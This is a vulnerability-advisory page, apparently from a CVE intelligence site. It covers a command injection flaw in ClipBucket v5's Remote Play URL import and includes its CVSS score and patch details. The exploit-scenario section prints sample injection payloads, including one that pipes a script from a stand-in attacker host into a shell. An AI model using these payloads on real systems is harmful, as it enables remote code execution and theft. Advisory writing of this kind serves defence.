ClipBucket v5
CVE-2026-42846
CRITICAL
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description states 'any authenticated user' can exploit, so PR:L not PR:N; network-reachable web feature with no user interaction yields full C/I/A as OS command execution.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly into shell commands without escaping then executed, so any shell metacharacter in the URL is interpreted. This results in arbitrary command execution. This issue has been patched in version 5.5.3 - #140.
AnalysisAI
Remote command injection in ClipBucket v5 prior to version 5.5.3 - #140 allows authenticated users to execute arbitrary OS commands by submitting a crafted URL through the Remote Play video import feature. The URL is concatenated unescaped into shell commands, so any metacharacter is interpreted by the shell, yielding code execution as the web server user. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires a valid authenticated account on the ClipBucket v5 instance (any role that can access the Remote Play / external URL import feature - per the description, 'any authenticated user' suffices) and network reachability to the application's web interface. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H scores 9.8, but the description explicitly states 'any authenticated user' is required - this contradicts PR:N in the published vector and the realistic vector should be PR:L. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers (or uses an existing) low-privilege ClipBucket account, navigates to the Remote Play import form, and submits a URL such as `http://x/;id;#` or `$(curl attacker.tld/sh|sh)` as the video source. When the backend invokes the downloader/transcoder with the URL concatenated into the shell command, the injected payload is executed as the web server user, giving the attacker an interactive reverse shell and full read/write access to the application database and uploaded media. … |
| Remediation | Upgrade to ClipBucket v5 version 5.5.3 - #140 or later, which contains the vendor-released patch per GHSA-hvfx-hxmr-28c7 (https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-hvfx-hxmr-28c7). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all ClipBucket deployments, disable the Remote Play feature if not actively used, and restrict network access to the application. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Unauthenticated blind SQL injection in ClipBucket v5 prior to version 5.5.3 - #129 allows remote attackers to exfiltrate
Authenticated SQL injection in ClipBucket v5 prior to release 5.5.3 - #132 allows any user with video-upload privileges
ClipBucket v5's subtitle management feature lacks ownership verification, enabling any authenticated user to upload, ren
SQL wildcard character injection in ClipBucket v5's subtitle editing endpoint allows authenticated users to overwrite al
Share
External POC / Exploit Code
Leaving vuln.today